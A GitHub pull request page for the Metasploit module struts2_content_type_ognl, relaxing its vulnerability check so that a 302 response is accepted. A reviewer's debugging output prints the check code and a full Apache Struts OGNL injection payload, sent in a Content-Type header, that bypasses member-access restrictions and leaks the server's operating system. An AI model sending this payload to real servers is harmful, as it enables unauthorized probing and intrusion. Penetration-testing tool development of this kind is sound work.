Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

struts2_content_type_ognl: Don't care about response code #12008

Merged
merged 1 commit into from Jun 25, 2019

Conversation

Projects
None yet
4 participants
@egypt
Copy link
Contributor

commented Jun 24, 2019

I found one that returned a 302 instead of 200

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/multi/http/struts2_content_type_ognl
  • check
  • Verify shows vuln even if the thing returns a 302
Don't worry about response code
I found one that returned a 302

@wvu-r7 wvu-r7 self-assigned this Jun 25, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 25, 2019

msf5 exploit(multi/http/struts2_content_type_ognl) > check

From: /rapid7/metasploit-framework/modules/exploits/multi/http/struts2_content_type_ognl.rb @ line 75 Msf::Modules::Exploit__Multi__Http__Struts2_content_type_ognl::MetasploitModule#check:

    62: def check
    63:   var_a = rand_text_alpha_lower(4)
    64:
    65:   ognl = ""
    66:   ognl << %q|(#os=@java.lang.System@getProperty('os.name')).|
    67:   ognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|
    68:
    69:   begin
    70:     resp = send_struts_request(ognl)
    71:   rescue Msf::Exploit::Failed
    72:     return Exploit::CheckCode::Unknown
    73:   end
    74:
 => 75:   require 'pry'; binding.pry
    76:
    77:   if resp && resp.headers && resp.headers[var_a]
    78:     vprint_good("Victim operating system: #{resp.headers[var_a]}")
    79:     Exploit::CheckCode::Vulnerable
    80:   else
    81:     Exploit::CheckCode::Safe
    82:   end
    83: end

[1] pry(#<Msf::Modules::Exploit__Multi__Http__Struts2_content_type_ognl::MetasploitModule>)> resp.code = 302
=> 302
[2] pry(#<Msf::Modules::Exploit__Multi__Http__Struts2_content_type_ognl::MetasploitModule>)> resp.headers[var_a] = 'ping egypt'
=> "ping egypt"
[3] pry(#<Msf::Modules::Exploit__Multi__Http__Struts2_content_type_ognl::MetasploitModule>)> resp
=> #<Rex::Proto::Http::Response:0x00007fac4633f690
 @auto_cl=true,
 @body=
  "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">\n<title>Directory listing for /</title>\n</head>\n<body>\n<h1>Directory listing for /</h1>\n<hr>\n<ul>\n</ul>\n<hr>\n</body>\n</html>\n",
 @body_bytes_left=0,
 @bufq="",
 @chunk_max_size=10,
 @chunk_min_size=1,
 @code=302,
 @count_100=0,
 @headers={"Server"=>"SimpleHTTP/0.6 Python/3.7.3", "Date"=>"Tue, 25 Jun 2019 05:52:35 GMT", "Content-type"=>"text/html; charset=utf-8", "Content-Length"=>"297", "ocfn"=>"ping egypt"},
 @inside_chunk=false,
 @max_data=1048576,
 @message="OK",
 @peerinfo={"addr"=>"127.0.0.1", "port"=>8080},
 @proto="1.0",
 @request=
  "GET / HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nContent-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#os=@java.lang.System@getProperty('os.name')).(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('ocfn', #os))}\r\nX-JZSZ: \r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n",
 @state=3,
 @transfer_chunked=false>
[4] pry(#<Msf::Modules::Exploit__Multi__Http__Struts2_content_type_ognl::MetasploitModule>)>

[+] Victim operating system: ping egypt
[+] 127.0.0.1:8080 - The target is vulnerable.
msf5 exploit(multi/http/struts2_content_type_ognl) >

@wvu-r7 wvu-r7 merged commit 303bfaa into rapid7:master Jun 25, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wvu-r7 added a commit that referenced this pull request Jun 25, 2019

msjenkins-r7 added a commit that referenced this pull request Jun 25, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 25, 2019

Release Notes

The exploit/multi/http/struts2_content_type_ognl module now ignores the response code while checking for the vulnerability, since a 302 (instead of a 200) code was seen in the wild.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.